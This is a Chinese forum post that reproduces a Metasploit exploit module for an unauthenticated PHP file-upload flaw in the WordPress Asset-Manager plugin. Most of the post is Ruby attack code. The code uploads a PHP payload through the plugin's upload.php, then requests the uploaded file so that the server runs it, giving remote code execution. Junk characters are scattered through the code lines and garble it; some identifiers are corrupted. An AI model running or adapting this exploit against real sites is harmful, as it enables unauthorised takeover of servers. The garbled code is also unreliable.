WordPress Asset-Manager PHP文件上传漏洞

admin

这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。

4 A- w6 x* F7 G2 O" d. B##
# This file is part of the Metasploit Framework and may be subject to
0 U& `" v3 R4 d) C# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
# L) c& P0 E& H; z1 K9 S  U# o; {##

: J; Z% x: ]. I" N  f/ `8 [require 'msf/core'
require 'msf/core/exploit/php_exe'
4 p7 @+ [( V; V; p% k4 t( o) Z
; a7 c' b- E- j0 M1 N, tclass Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
: k# c* H5 _5 ?9 _) K( i" g
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit:hpEXE

8 H% j4 |  i. Z2 b  i$ j" ^9 e; h  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
' g' c+ ^6 _2 x) V        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
' O3 o. E* o. Y+ V7 |        [
          'Sammy FORGIT', # initial discovery
6 D. t5 ?6 q8 x$ g& j+ z          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
9 N/ s  l5 i8 c# w6 K3 a      'License'        => MSF_LICENSE,
      'References'     =>
        [
5 W$ q# H' `4 D, k$ p% G& y) o          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
8 w5 V* q$ f# {- m& H3 N          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
4 w) G; K, r) ]8 N7 L# b  K! {        {
          'BadChars' => "\x00",
        },
: |& ?- ]( ^8 v, V      'Platform'       => 'php',
$ O6 }' C6 B+ t- Z& J      'Arch'           => ARCH_PHP,
1 m" F- f$ }1 v$ N) j2 L, _: r      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
5 u5 ~9 D7 @0 r' g7 t      'DefaultTarget' => 0,
8 {" y5 f2 U% j8 }8 w& n4 m      'DisclosureDate' => 'May 26 2012'))

" e! n8 U+ x1 l- L5 n- @) x7 l: W    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 e5 p; ~% \8 B& I/ C$ I0 z      ], self.class)
  end

( Q/ U& x$ N/ v  def exploit
3 a3 }9 F) ?! \    uri =  target_uri.path
! k! j! V+ P8 @4 A    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
5 x7 N! t0 R5 W; `6 d" P8 Q    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
/ J- _% s, B/ W) L. n% ?/ j    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
2 L( u5 T" I% h5 e# z: W      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })
- Q7 d! {7 N5 i2 ?% c) W
6 V' H; B. @: W    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ p' r9 S8 p$ y2 N( wend
+ m- c( u# I* B
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
6 ?6 E+ @# _7 }$ ~8 f& J    })

    if res and res.code != 200
3 I9 d, x# _! S& ?/ l      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 Z/ f: A/ T& v* t5 T& q" X& W4 n    end
  end
end